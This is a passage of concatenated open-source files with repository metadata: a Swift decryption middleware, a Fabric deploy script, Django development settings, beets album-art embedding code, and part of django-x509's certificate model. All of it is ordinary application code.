"name": "Makefile",
"bytes": "14501"
},
{
"name": "PHP",
"bytes": "6693"
},
{
"name": "Python",
"bytes": "40046"
},
{
"name": "Ruby",
"bytes": "5458"
},
{
"name": "Shell",
"bytes": "31878"
}
],
"symlink_target": ""
} |
from swift.common.swob import Request, HTTPException, HTTPForbidden
from swift.common.middleware.crypto import decrypter
from swift.common.request_helpers import get_container_update_override_key
from swift.common.utils import config_true_value
from swift.proxy.controllers.base import get_object_info
class DecrypterObjContext(decrypter.DecrypterObjContext):
    """Object-level decryption context that, unlike upstream swift, falls
    back to the container key for read requests when the object key
    cannot be fetched."""

    def get_decryption_keys(self, req, crypto_meta=None):
        """
        Determine if a response should be decrypted, and if so then fetch keys.

        :param req: a Request object
        :param crypto_meta: optional crypto metadata dict; its 'key_id'
            entry (if any) is forwarded to the key master
        :returns: a dict of decryption keys, or None when decryption is
            overridden, unnecessary, or keys cannot be obtained
        """
        if config_true_value(req.environ.get('swift.crypto.override')):
            self.logger.debug('No decryption is necessary because of override')
            return None
        info = get_object_info(req.environ, self.app, swift_source='DCRYPT')
        if 'crypto-etag' not in info['sysmeta']:
            # object is not cyphered
            return None
        key_id = crypto_meta.get('key_id') if crypto_meta else None
        try:
            return self.get_keys(req.environ, key_id=key_id)
        except HTTPException:
            # FIXME(FVE): check swift_source, accept if it is internal
            # FIXME(FVE): move that code to avoid printing an error
            if req.method in ('HEAD', 'GET'):
                # read requests: retry with only the container key before
                # giving up (None disables decryption for this response)
                try:
                    return self.get_keys(req.environ, ['container'],
                                         key_id=key_id)
                except HTTPException:
                    pass
                return None
            else:
                # non-read verbs propagate the key master's error
                raise

    def decrypt_resp_headers(self, put_keys, post_keys):
        """
        Find encrypted headers and replace with the decrypted versions.

        :param put_keys: a dict of decryption keys used for object PUT.
        :param post_keys: a dict of decryption keys used for object POST.
        :return: A list of headers with any encrypted headers replaced by their
            decrypted values.
        :raises HTTPInternalServerError: if any error occurs while decrypting
            headers
        :raises HTTPForbidden: if the decryption key is invalid
        """
        mod_hdr_pairs = []
        if put_keys:
            # Decrypt plaintext etag and place in Etag header for client
            # response
            etag_header = 'X-Object-Sysmeta-Crypto-Etag'
            encrypted_etag = self._response_header_value(etag_header)
            decrypted_etag = None
            if encrypted_etag and 'object' in put_keys:
                decrypted_etag = self._decrypt_header(
                    etag_header, encrypted_etag, put_keys['object'],
                    required=True)
                mod_hdr_pairs.append(('Etag', decrypted_etag))
            etag_header = get_container_update_override_key('etag')
            encrypted_etag = self._response_header_value(etag_header)
            if encrypted_etag and 'container' in put_keys:
                dcrypt_etag_override = self._decrypt_header(
                    etag_header, encrypted_etag, put_keys['container'])
                # both headers decrypt to the same plaintext etag; a
                # mismatch means one of the supplied keys is wrong
                if decrypted_etag and dcrypt_etag_override != decrypted_etag:
                    self.app.logger.debug('Failed ETag verification')
                    raise HTTPForbidden('Invalid key')
                mod_hdr_pairs.append((etag_header, dcrypt_etag_override))
                # The real swift saves the cyphered ETag in the 'ETag' field,
                # whereas we store the ETag of the cyphered object.
                # The ETag of the cyphered object is of no use for previous
                # middlewares, so we replace it with the plaintext ETag.
                mod_hdr_pairs.append(('ETag', dcrypt_etag_override))
        # Decrypt all user metadata. Encrypted user metadata values are stored
        # in the x-object-transient-sysmeta-crypto-meta- namespace. Those are
        # decrypted and moved back to the x-object-meta- namespace. Prior to
        # decryption, the response should have no x-object-meta- headers, but
        # if it does then they will be overwritten by any decrypted headers
        # that map to the same x-object-meta- header names i.e. decrypted
        # headers win over unexpected, unencrypted headers.
        try:
            if post_keys:
                mod_hdr_pairs.extend(self.decrypt_user_metadata(post_keys))
            # keep every untouched response header that was not replaced
            mod_hdr_names = {h.lower() for h, v in mod_hdr_pairs}
            mod_hdr_pairs.extend([(h, v) for h, v in self._response_headers
                                  if h.lower() not in mod_hdr_names])
        except KeyError:
            # NOTE(review): when this fires mid-way, the unmodified
            # response headers are NOT re-appended — confirm intended
            self.app.logger.debug('Not able to decrypt user metadata')
        return mod_hdr_pairs
class Decrypter(decrypter.Decrypter):
    """Middleware for decrypting data and user metadata."""

    def __call__(self, env, start_response):
        request = Request(env)
        try:
            parts = request.split_path(3, 4, True)
        except ValueError:
            # not a v1/account/container[/object] path: pass through
            return self.app(env, start_response)
        container, obj = parts[2], parts[3]
        if obj and request.method in ('HEAD', 'GET'):
            context = DecrypterObjContext(self, self.logger)
        elif container and request.method == 'GET':
            context = decrypter.DecrypterContContext(self, self.logger)
        else:
            # url and/or request verb is not handled by decrypter
            return self.app(env, start_response)
        try:
            return context.handle(request, start_response)
        except HTTPException as err_resp:
            return err_resp(env, start_response)
| {
"content_hash": "69b1d4df0898c6cb8914cc362914f518",
"timestamp": "",
"source": "github",
"line_count": 125,
"max_line_length": 79,
"avg_line_length": 45.12,
"alnum_prop": 0.5966312056737588,
"repo_name": "open-io/oio-swift",
"id": "9bd49b54dcde1d08bdef6a4699abecea9b716c61",
"size": "6272",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "oioswift/common/middleware/crypto/decrypter.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Lua",
"bytes": "1654"
},
{
"name": "Python",
"bytes": "331417"
},
{
"name": "Shell",
"bytes": "84684"
}
],
"symlink_target": ""
} |
from __future__ import with_statement
from fabric.api import *
from fabric.context_managers import shell_env
# Fabric connection settings: deploy as the `django` user on the host below.
env.user = 'django'
env.hosts = ['insomn.io']
def deploy():
    """Update the RSVPBot checkout on the server and restart its service."""
    project_root = '/home/django/RSVPBot'
    with cd(project_root):
        for command in ('git pull',
                        'pip install -r requirements.txt',
                        'sudo service rsvp restart'):
            run(command)
"content_hash": "a3c891f914795f844ff2aacf331c598c",
"timestamp": "",
"source": "github",
"line_count": 13,
"max_line_length": 45,
"avg_line_length": 24.53846153846154,
"alnum_prop": 0.7084639498432602,
"repo_name": "kokeshii/RSVPBot",
"id": "caf73fe03521287eb58ac2cb1efdb324cf06cbda",
"size": "319",
"binary": false,
"copies": "1",
"ref": "refs/heads/dev",
"path": "fabfile.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "75689"
}
],
"symlink_target": ""
} |
"""
Django settings for group_meeting project.
For more information on this file, see
https://docs.djangoproject.com/en/1.6/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.6/ref/settings/
"""
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
import os

# Filesystem anchors for the project layout.
SETTINGS_DIR = os.path.dirname(__file__)
BASE_DIR = os.path.dirname(SETTINGS_DIR)
PROJECT_PATH = os.path.abspath(os.path.join(SETTINGS_DIR, os.pardir))
TEMPLATE_PATH = os.path.join(PROJECT_PATH, 'templates')
STATIC_PATH = os.path.join(PROJECT_PATH, 'static/')
# STATIC_ROOT = os.path.join(PROJECT_PATH, 'static/')
MEDIA_ROOT = os.path.join(PROJECT_PATH, 'media/')
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.6/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '8$v7k5_=jiyjd=e^flm9!-myv^w&q1w5%tqlff310q#a1zx#lo'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
TEMPLATE_DEBUG = True
# Empty is acceptable while DEBUG=True; list served hosts in production.
ALLOWED_HOSTS = []
# NOTE(review): these overlap with TEMPLATE_PATH/STATIC_PATH defined above
# but are built with string concatenation instead of os.path.join —
# confirm which pair is authoritative.
TEMPLATE_DIRS = (
    BASE_DIR + '/templates/',
)
STATIC_DIRS = (
    BASE_DIR + '/static/',
)
# Application definition
DEFAULT_APPS = [
    'django.contrib.admin',
    'django.contrib.auth',
    # fix: 'contenttypes' was listed twice in the original; each app must
    # appear only once in INSTALLED_APPS
    'django.contrib.contenttypes',
    'django.contrib.sessions',
    'django.contrib.messages',
    'django.contrib.staticfiles',
]
# Third-party packages (south = schema migrations for Django < 1.7).
THIRD_PARTY_APPS = [
    'south',
]
# Apps that live in this repository.
LOCAL_APPS = [
    'meeting',
]
INSTALLED_APPS = DEFAULT_APPS + THIRD_PARTY_APPS + LOCAL_APPS
MIDDLEWARE_CLASSES = (
    'django.contrib.sessions.middleware.SessionMiddleware',
    'django.middleware.common.CommonMiddleware',
    'django.middleware.csrf.CsrfViewMiddleware',
    'django.contrib.auth.middleware.AuthenticationMiddleware',
    'django.contrib.messages.middleware.MessageMiddleware',
    'django.middleware.clickjacking.XFrameOptionsMiddleware',
)
# fix: the upload handlers below were mistakenly listed inside
# MIDDLEWARE_CLASSES — they are not middleware classes. Django reads them
# from the FILE_UPLOAD_HANDLERS setting (these two are Django's defaults).
FILE_UPLOAD_HANDLERS = (
    "django.core.files.uploadhandler.MemoryFileUploadHandler",
    "django.core.files.uploadhandler.TemporaryFileUploadHandler",
)
# Template context processors: the Django 1.6 defaults plus "request".
TEMPLATE_CONTEXT_PROCESSORS = (
    "django.core.context_processors.request",
    "django.contrib.auth.context_processors.auth",
    "django.core.context_processors.debug",
    "django.core.context_processors.i18n",
    "django.core.context_processors.media",
    "django.core.context_processors.static",
    "django.core.context_processors.tz",
    "django.contrib.messages.context_processors.messages",
    # "meeting.processors.base",
)
ROOT_URLCONF = 'group_meeting.urls'
WSGI_APPLICATION = 'group_meeting.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.6/ref/settings/#databases
# Development database: a single SQLite file in the repository root.
DATABASES = {
    'default': {
        'ENGINE': 'django.db.backends.sqlite3',
        'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
    }
}
# Internationalization
# https://docs.djangoproject.com/en/1.6/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'America/New_York'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.6/howto/static-files/
STATIC_URL = '/static/'
# Extra (non-app) directories searched by the staticfiles finders.
STATICFILES_DIRS = (
    STATIC_PATH,
)
MEDIA_URL = '/media/'
| {
"content_hash": "bbcc89f41527d3c5ccf42400c7141fac",
"timestamp": "",
"source": "github",
"line_count": 128,
"max_line_length": 71,
"avg_line_length": 25.40625,
"alnum_prop": 0.7158671586715867,
"repo_name": "scavedo159/group_meeting",
"id": "7c51a114035c5f8fb66d7044fbf3bad9efe2142f",
"size": "3252",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "group_meeting/settings.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "2114"
},
{
"name": "JavaScript",
"bytes": "92478"
},
{
"name": "Python",
"bytes": "42664"
}
],
"symlink_target": ""
} |
"""High-level utilities for manipulating image files associated with
music and items' embedded album art.
"""
from __future__ import division, absolute_import, print_function
import subprocess
import platform
from tempfile import NamedTemporaryFile
import imghdr
import os
from beets.util import displayable_path, syspath
from beets.util.artresizer import ArtResizer
from beets import mediafile
def mediafile_image(image_path, maxwidth=None):
    """Return a `mediafile.Image` object for the path.

    ``maxwidth`` is accepted but unused here: the image data is read
    as-is and tagged as front cover art.
    """
    with open(syspath(image_path), 'rb') as f:
        data = f.read()
    return mediafile.Image(data, type=mediafile.ImageType.front)
def get_art(log, item):
    """Return the raw embedded art data for `item`, or None on failure."""
    try:
        media = mediafile.MediaFile(syspath(item.path))
    except mediafile.UnreadableFileError as exc:
        log.warning(u'Could not extract art from {0}: {1}',
                    displayable_path(item.path), exc)
        return None
    return media.art
def embed_item(log, item, imagepath, maxwidth=None, itempath=None,
               compare_threshold=0, ifempty=False, as_album=False):
    """Embed an image into the item's media file.

    The write is skipped when the similarity check fails, when art is
    already present and `ifempty` is set, or when the image type is not
    JPEG/PNG.
    """
    # Conditions and filters.
    if compare_threshold and not check_art_similarity(log, item, imagepath,
                                                      compare_threshold):
        log.info(u'Image not similar; skipping.')
        return
    if ifempty and get_art(log, item):
        log.info(u'media file already contained art')
        return
    if maxwidth and not as_album:
        imagepath = resize_image(log, imagepath, maxwidth)
    # Get the `Image` object from the file.
    try:
        log.debug(u'embedding {0}', displayable_path(imagepath))
        art_image = mediafile_image(imagepath, maxwidth)
    except IOError as exc:
        log.warning(u'could not read image file: {0}', exc)
        return
    # Make sure the image kind is safe (some formats only support PNG
    # and JPEG).
    if art_image.mime_type not in ('image/jpeg', 'image/png'):
        log.info('not embedding image of unsupported type: {}',
                 art_image.mime_type)
        return
    item.try_write(path=itempath, tags={'images': [art_image]})
def embed_album(log, album, maxwidth=None, quiet=False,
                compare_threshold=0, ifempty=False):
    """Embed album art into all of the album's items."""
    art_path = album.artpath
    if not art_path:
        log.info(u'No album art present for {0}', album)
        return
    if not os.path.isfile(syspath(art_path)):
        log.info(u'Album art not found at {0} for {1}',
                 displayable_path(art_path), album)
        return
    if maxwidth:
        art_path = resize_image(log, art_path, maxwidth)
    log.info(u'Embedding album art into {0}', album)
    for album_item in album.items():
        embed_item(log, album_item, art_path, maxwidth, None,
                   compare_threshold, ifempty, as_album=True)
def resize_image(log, imagepath, maxwidth):
    """Resize the image at `imagepath` to `maxwidth` and return its path."""
    log.debug(u'Resizing album art to {0} pixels wide', maxwidth)
    return ArtResizer.shared.resize(maxwidth, syspath(imagepath))
def check_art_similarity(log, item, imagepath, compare_threshold):
    """A boolean indicating if an image is similar to embedded item art.

    Pipes ImageMagick ``convert`` into ``compare`` to obtain a perceptual
    hash (PHASH) distance between the two images. Returns True when the
    item has no embedded art; returns None when the tools fail or emit
    something that is not a number.
    """
    with NamedTemporaryFile(delete=True) as f:
        art = extract(log, f.name, item)
        if art:
            is_windows = platform.system() == "Windows"
            # Converting images to grayscale tends to minimize the weight
            # of colors in the diff score.
            convert_proc = subprocess.Popen(
                [b'convert', syspath(imagepath), syspath(art),
                 b'-colorspace', b'gray', b'MIFF:-'],
                stdout=subprocess.PIPE,
                close_fds=not is_windows,
            )
            compare_proc = subprocess.Popen(
                [b'compare', b'-metric', b'PHASH', b'-', b'null:'],
                stdin=convert_proc.stdout,
                stdout=subprocess.PIPE,
                stderr=subprocess.PIPE,
                close_fds=not is_windows,
            )
            # standard pipeline idiom: close our handle so `convert` can
            # receive SIGPIPE if `compare` exits early
            convert_proc.stdout.close()
            stdout, stderr = compare_proc.communicate()
            if compare_proc.returncode:
                # exit code 1 only means the images differ; anything
                # else is a real failure
                if compare_proc.returncode != 1:
                    log.debug(u'IM phashes compare failed for {0}, {1}',
                              displayable_path(imagepath),
                              displayable_path(art))
                    return
                out_str = stderr
            else:
                out_str = stdout
            try:
                phash_diff = float(out_str)
            except ValueError:
                log.debug(u'IM output is not a number: {0!r}', out_str)
                return
            log.debug(u'compare PHASH score is {0}', phash_diff)
            return phash_diff <= compare_threshold
        return True
def extract(log, outpath, item):
    """Write `item`'s embedded art to `outpath` (plus a type extension).

    Returns the final path, or None when no art is present or its image
    type cannot be identified.
    """
    art = get_art(log, item)
    if not art:
        log.info(u'No album art present in {0}, skipping.', item)
        return
    # Add an extension to the filename.
    kind = imghdr.what(None, h=art)
    if not kind:
        log.warning(u'Unknown image type in {0}.',
                    displayable_path(item.path))
        return
    outpath += b'.' + kind
    log.info(u'Extracting album art from: {0} to: {1}',
             item, displayable_path(outpath))
    with open(syspath(outpath), 'wb') as f:
        f.write(art)
    return outpath
def extract_first(log, outpath, items):
    """Extract art from the first item that has any and return its path."""
    for candidate in items:
        extracted = extract(log, outpath, candidate)
        if extracted:
            return extracted
def clear(log, lib, query):
    """Remove embedded art from every item matching `query`."""
    matched = lib.items(query)
    log.info(u'Clearing album art from {0} items', len(matched))
    for matched_item in matched:
        log.debug(u'Clearing art for {0}', matched_item)
        matched_item.try_write(tags={'images': None})
| {
"content_hash": "f73ed04b0499212292fcf0b2bdfffe7f",
"timestamp": "",
"source": "github",
"line_count": 185,
"max_line_length": 77,
"avg_line_length": 32.13513513513514,
"alnum_prop": 0.5962994112699748,
"repo_name": "Freso/beets",
"id": "7a65a2b806efc938720026124634b5031a4dca98",
"size": "6616",
"binary": false,
"copies": "5",
"ref": "refs/heads/master",
"path": "beets/art.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "2951"
},
{
"name": "HTML",
"bytes": "3307"
},
{
"name": "JavaScript",
"bytes": "85950"
},
{
"name": "Python",
"bytes": "1576789"
},
{
"name": "Shell",
"bytes": "7413"
}
],
"symlink_target": ""
} |
import collections
import uuid
from datetime import datetime, timedelta
import OpenSSL
import swapper
from django.core.exceptions import ValidationError
from django.db import models
from django.utils import timezone
from django.utils.functional import cached_property
from django.utils.safestring import mark_safe
from django.utils.translation import gettext_lazy as _
from jsonfield import JSONField
from model_utils.fields import AutoCreatedField, AutoLastModifiedField
from OpenSSL import crypto
from .. import settings as app_settings
# strftime patterns for the two ASN.1 time encodings used by X.509
# (RFC 5280): GeneralizedTime carries a 4-digit year, UTCTime a 2-digit one.
generalized_time = '%Y%m%d%H%M%SZ'
utc_time = '%y%m%d%H%M%SZ'
# RSA key sizes selectable in the admin, as (value, label) pairs
KEY_LENGTH_CHOICES = (
    ('512', '512'),
    ('1024', '1024'),
    ('2048', '2048'),
    ('4096', '4096'),
)
# digest algorithms selectable for certificate signing
DIGEST_CHOICES = (
    ('sha1', 'SHA1'),
    ('sha224', 'SHA224'),
    ('sha256', 'SHA256'),
    ('sha384', 'SHA384'),
    ('sha512', 'SHA512'),
)
# maps OpenSSL signature-algorithm names (X509.get_signature_algorithm())
# to our DIGEST_CHOICES values; used when importing existing certificates
SIGNATURE_MAPPING = {
    'sha1WithRSAEncryption': 'sha1',
    'sha224WithRSAEncryption': 'sha224',
    'sha256WithRSAEncryption': 'sha256',
    'sha384WithRSAEncryption': 'sha384',
    'sha512WithRSAEncryption': 'sha512',
}
def datetime_to_string(datetime_):
    """
    Converts datetime.datetime object to UTCTime/GeneralizedTime string
    following RFC5280. (Returns string encoded in UTCtime for dates through year
    2049, otherwise in GeneralizedTime format)
    """
    fmt = utc_time if datetime_.year < 2050 else generalized_time
    return datetime_.strftime(fmt)
def default_validity_start():
    """
    Sets validity_start field to 1 day before the current date
    (avoids "certificate not valid yet" edge case).

    In some cases, because of timezone differences, when certificates
    were just created they were considered valid in a timezone (eg: Europe)
    but not yet valid in another timezone (eg: US).

    This function intentionally returns naive datetime (not timezone aware),
    so that certificates are valid from 00:00 AM in all timezones.
    """
    yesterday = datetime.now() - timedelta(days=1)
    return yesterday.replace(hour=0, minute=0, second=0, microsecond=0)
def default_ca_validity_end():
    """
    returns the default value for validity_end field
    (now plus ``DEFAULT_CA_VALIDITY`` days)
    """
    return timezone.now() + timedelta(days=app_settings.DEFAULT_CA_VALIDITY)
def default_cert_validity_end():
    """
    returns the default value for validity_end field
    (now plus ``DEFAULT_CERT_VALIDITY`` days)
    """
    return timezone.now() + timedelta(days=app_settings.DEFAULT_CERT_VALIDITY)
def default_key_length():
    """
    returns default value for key_length field
    (this avoids to set the exact default value in the database migration)
    """
    return app_settings.DEFAULT_KEY_LENGTH
def default_digest_algorithm():
    """
    returns default value for digest field
    (this avoids to set the exact default value in the database migration)
    """
    return app_settings.DEFAULT_DIGEST_ALGORITHM
class BaseX509(models.Model):
    """
    Abstract Cert class, shared between Ca and Cert
    """

    # human-readable identifier of the certificate
    name = models.CharField(max_length=64)
    notes = models.TextField(blank=True)
    key_length = models.CharField(
        _('key length'),
        help_text=_('bits'),
        choices=KEY_LENGTH_CHOICES,
        default=default_key_length,
        max_length=6,
    )
    digest = models.CharField(
        _('digest algorithm'),
        help_text=_('bits'),
        choices=DIGEST_CHOICES,
        default=default_digest_algorithm,
        max_length=8,
    )
    validity_start = models.DateTimeField(
        blank=True, null=True, default=default_validity_start
    )
    validity_end = models.DateTimeField(
        blank=True, null=True, default=default_cert_validity_end
    )
    # x509 subject fields
    country_code = models.CharField(max_length=2, blank=True)
    state = models.CharField(_('state or province'), max_length=64, blank=True)
    city = models.CharField(_('city'), max_length=64, blank=True)
    organization_name = models.CharField(_('organization'), max_length=64, blank=True)
    organizational_unit_name = models.CharField(
        _('organizational unit name'), max_length=64, blank=True
    )
    email = models.EmailField(_('email address'), blank=True)
    common_name = models.CharField(_('common name'), max_length=64, blank=True)
    extensions = JSONField(
        _('extensions'),
        default=list,
        blank=True,
        help_text=_('additional x509 certificate extensions'),
        load_kwargs={'object_pairs_hook': collections.OrderedDict},
        dump_kwargs={'indent': 4},
    )
    # serial_number is set to CharField as a UUID integer is too big for a
    # PositiveIntegerField and an IntegerField on SQLite
    serial_number = models.CharField(
        _('serial number'),
        help_text=_('leave blank to determine automatically'),
        blank=True,
        null=True,
        max_length=48,
    )
    certificate = models.TextField(
        blank=True, help_text='certificate in X.509 PEM format'
    )
    private_key = models.TextField(
        blank=True, help_text='private key in X.509 PEM format'
    )
    created = AutoCreatedField(_('created'), editable=True)
    modified = AutoLastModifiedField(_('modified'), editable=True)
    passphrase = models.CharField(
        max_length=64,
        blank=True,
        help_text=_('Passphrase for the private key, if present'),
    )

    class Meta:
        abstract = True

    def __str__(self):
        return self.name

    def clean_fields(self, *args, **kwargs):
        # importing existing certificate
        # must be done here in order to validate imported fields
        # and fill private and public key before validation fails
        if self._state.adding and self.certificate and self.private_key:
            self._validate_pem()
            self._import()
        super().clean_fields(*args, **kwargs)

    def clean(self):
        # when importing, both public and private must be present
        if (self.certificate and not self.private_key) or (
            self.private_key and not self.certificate
        ):
            raise ValidationError(
                _(
                    'When importing an existing certificate, both'
                    'keys (private and public) must be present'
                )
            )
        if self.serial_number:
            self._validate_serial_number()
        self._verify_extension_format()

    def save(self, *args, **kwargs):
        """Persist the model; on first save without imported PEM data,
        generate a new key pair and certificate."""
        generate = False
        if not self.pk and not self.certificate and not self.private_key:
            generate = True
        super().save(*args, **kwargs)
        if generate:
            # automatically determine serial number
            if not self.serial_number:
                self.serial_number = self._generate_serial_number()
            self._generate()
            # second save stores the generated PEM data on the same row
            kwargs['force_insert'] = False
            super().save(*args, **kwargs)

    @cached_property
    def x509(self):
        """
        returns an instance of OpenSSL.crypto.X509
        """
        if self.certificate:
            return crypto.load_certificate(crypto.FILETYPE_PEM, self.certificate)

    @cached_property
    def x509_text(self):
        """
        returns a text dump of the information
        contained in the x509 certificate
        """
        if self.certificate:
            text = crypto.dump_certificate(crypto.FILETYPE_TEXT, self.x509)
            return text.decode('utf-8')

    @cached_property
    def pkey(self):
        """
        returns an instance of OpenSSL.crypto.PKey
        """
        if self.private_key:
            return crypto.load_privatekey(
                crypto.FILETYPE_PEM,
                self.private_key,
                passphrase=getattr(self, 'passphrase').encode('utf-8'),
            )

    def _validate_pem(self):
        """
        (internal use only)
        validates certificate and private key
        """
        errors = {}
        for field in ['certificate', 'private_key']:
            # maps 'certificate' -> load_certificate,
            # 'private_key' -> load_privatekey
            method_name = 'load_{0}'.format(field.replace('_', ''))
            load_pem = getattr(crypto, method_name)
            try:
                args = (crypto.FILETYPE_PEM, getattr(self, field))
                kwargs = {}
                if method_name == 'load_privatekey':
                    kwargs['passphrase'] = getattr(self, 'passphrase').encode('utf8')
                load_pem(*args, **kwargs)
            except OpenSSL.crypto.Error as e:
                error = 'OpenSSL error: <br>{0}'.format(
                    str(e.args[0]).replace('), ', '), <br>').strip('[]')
                )
                # 'bad decrypt' indicates a wrong passphrase, report it
                # on the passphrase field instead of the PEM field
                if 'bad decrypt' in error:
                    error = '<b>Incorrect Passphrase</b> <br>' + error
                    errors['passphrase'] = ValidationError(_(mark_safe(error)))
                    continue
                errors[field] = ValidationError(_(mark_safe(error)))
        if errors:
            raise ValidationError(errors)

    def _validate_serial_number(self):
        """
        (internal use only)
        validates serial number if set manually
        """
        try:
            int(self.serial_number)
        except ValueError:
            raise ValidationError(
                {'serial_number': _('Serial number must be an integer')}
            )

    def _generate(self):
        """
        (internal use only)
        generates a new x509 certificate (CA or end-entity)
        """
        key = crypto.PKey()
        key.generate_key(crypto.TYPE_RSA, int(self.key_length))
        cert = crypto.X509()
        subject = self._fill_subject(cert.get_subject())
        cert.set_version(0x2)  # version 3 (0 indexed counting)
        cert.set_subject(subject)
        cert.set_serial_number(int(self.serial_number))
        cert.set_notBefore(bytes(str(datetime_to_string(self.validity_start)), 'utf8'))
        cert.set_notAfter(bytes(str(datetime_to_string(self.validity_end)), 'utf8'))
        # generating certificate for CA
        if not hasattr(self, 'ca'):
            issuer = cert.get_subject()
            issuer_key = key
        # generating certificate issued by a CA
        else:
            issuer = self.ca.x509.get_subject()
            issuer_key = self.ca.pkey
        cert.set_issuer(issuer)
        cert.set_pubkey(key)
        cert = self._add_extensions(cert)
        cert.sign(issuer_key, str(self.digest))
        self.certificate = crypto.dump_certificate(crypto.FILETYPE_PEM, cert).decode(
            'utf-8'
        )
        key_args = (crypto.FILETYPE_PEM, key)
        key_kwargs = {}
        # encrypt the private key only when a passphrase is set
        if self.passphrase:
            key_kwargs['passphrase'] = self.passphrase.encode('utf-8')
            key_kwargs['cipher'] = 'DES-EDE3-CBC'
        self.private_key = crypto.dump_privatekey(*key_args, **key_kwargs).decode(
            'utf-8'
        )

    def _fill_subject(self, subject):
        """
        (internal use only)
        fills OpenSSL.crypto.X509Name object
        """
        attr_map = {
            'country_code': 'countryName',
            'state': 'stateOrProvinceName',
            'city': 'localityName',
            'organization_name': 'organizationName',
            'organizational_unit_name': 'organizationalUnitName',
            'email': 'emailAddress',
            'common_name': 'commonName',
        }
        # set x509 subject attributes only if not empty strings
        for model_attr, subject_attr in attr_map.items():
            value = getattr(self, model_attr)
            if value:
                # coerce value to string, allow these fields to be redefined
                # as foreign keys by subclasses without losing compatibility
                setattr(subject, subject_attr, str(value))
        return subject

    def _import(self):
        """
        (internal use only)
        imports existing x509 certificates
        """
        cert = self.x509
        # when importing an end entity certificate
        if hasattr(self, 'ca'):
            self._verify_ca()
        self.key_length = str(cert.get_pubkey().bits())
        # this line might fail if a certificate with
        # an unsupported signature algorithm is imported
        algorithm = cert.get_signature_algorithm().decode('utf8')
        self.digest = SIGNATURE_MAPPING[algorithm]
        not_before = cert.get_notBefore().decode('utf8')
        self.validity_start = datetime.strptime(not_before, generalized_time)
        self.validity_start = timezone.make_aware(self.validity_start)
        not_after = cert.get_notAfter().decode('utf8')
        self.validity_end = datetime.strptime(not_after, generalized_time)
        # NOTE(review): the result of replace() is discarded and the value
        # is overwritten by make_aware() below — this line looks dead; confirm
        self.validity_end.replace(tzinfo=timezone.tzinfo())
        self.validity_end = timezone.make_aware(self.validity_end)
        subject = cert.get_subject()
        self.country_code = subject.countryName or ''
        # allow importing from legacy systems which use invalid country codes
        if len(self.country_code) > 2:
            self.country_code = ''
        self.state = subject.stateOrProvinceName or ''
        self.city = subject.localityName or ''
        self.organization_name = subject.organizationName or ''
        self.organizational_unit_name = subject.organizationalUnitName or ''
        self.email = subject.emailAddress or ''
        self.common_name = subject.commonName or ''
        self.serial_number = cert.get_serial_number()
        # fall back to common name (or serial) when no name was supplied
        if not self.name:
            self.name = self.common_name or str(self.serial_number)

    def _verify_ca(self):
        """
        (internal use only)
        verifies the current x509 is signed
        by the associated CA
        """
        store = crypto.X509Store()
        store.add_cert(self.ca.x509)
        store_ctx = crypto.X509StoreContext(store, self.x509)
        try:
            store_ctx.verify_certificate()
        except crypto.X509StoreContextError as e:
            raise ValidationError(
                _("CA doesn't match, got the " 'following error from pyOpenSSL: "%s"')
                % e.args[0][2]
            )

    def _verify_extension_format(self):
        """
        (internal use only)
        verifies the format of ``self.extension`` is correct
        (a list of dicts, each carrying name/critical/value keys)
        """
        msg = 'Extension format invalid'
        if not isinstance(self.extensions, list):
            raise ValidationError(msg)
        for ext in self.extensions:
            if not isinstance(ext, dict):
                raise ValidationError(msg)
            if not ('name' in ext and 'critical' in ext and 'value' in ext):
                raise ValidationError(msg)

    def _add_extensions(self, cert):
        """
        (internal use only)
        adds x509 extensions to ``cert``
        """
        ext = []
        # prepare extensions for CA
        if not hasattr(self, 'ca'):
            pathlen = app_settings.CA_BASIC_CONSTRAINTS_PATHLEN
            ext_value = 'CA:TRUE'
            if pathlen is not None:
                ext_value = '{0}, pathlen:{1}'.format(ext_value, pathlen)
            ext.append(
                crypto.X509Extension(
                    b'basicConstraints',
                    app_settings.CA_BASIC_CONSTRAINTS_CRITICAL,
                    bytes(str(ext_value), 'utf8'),
                )
            )
            ext.append(
                crypto.X509Extension(
                    b'keyUsage',
                    app_settings.CA_KEYUSAGE_CRITICAL,
                    bytes(str(app_settings.CA_KEYUSAGE_VALUE), 'utf8'),
                )
            )
            # self-signed: the issuer is the certificate itself
            issuer_cert = cert
        # prepare extensions for end-entity certs
        else:
            ext.append(crypto.X509Extension(b'basicConstraints', False, b'CA:FALSE'))
            ext.append(
                crypto.X509Extension(
                    b'keyUsage',
                    app_settings.CERT_KEYUSAGE_CRITICAL,
                    bytes(str(app_settings.CERT_KEYUSAGE_VALUE), 'utf8'),
                )
            )
            issuer_cert = self.ca.x509
        ext.append(
            crypto.X509Extension(b'subjectKeyIdentifier', False, b'hash', subject=cert)
        )
        cert.add_extensions(ext)
        # authorityKeyIdentifier must be added after
        # the other extensions have been already added
        cert.add_extensions(
            [
                crypto.X509Extension(
                    b'authorityKeyIdentifier',
                    False,
                    b'keyid:always,issuer:always',
                    issuer=issuer_cert,
                )
            ]
        )
        # finally, any user-supplied extensions from the JSON field
        for ext in self.extensions:
            cert.add_extensions(
                [
                    crypto.X509Extension(
                        bytes(str(ext['name']), 'utf8'),
                        bool(ext['critical']),
                        bytes(str(ext['value']), 'utf8'),
                    )
                ]
            )
        return cert

    def renew(self):
        """Regenerate key pair and certificate with a fresh serial number
        and the class default validity end date, then save."""
        self._generate()
        self.serial_number = self._generate_serial_number()
        self.validity_end = self.__class__().validity_end
        self.save()

    def _generate_serial_number(self):
        # 128-bit random serial derived from a UUID4
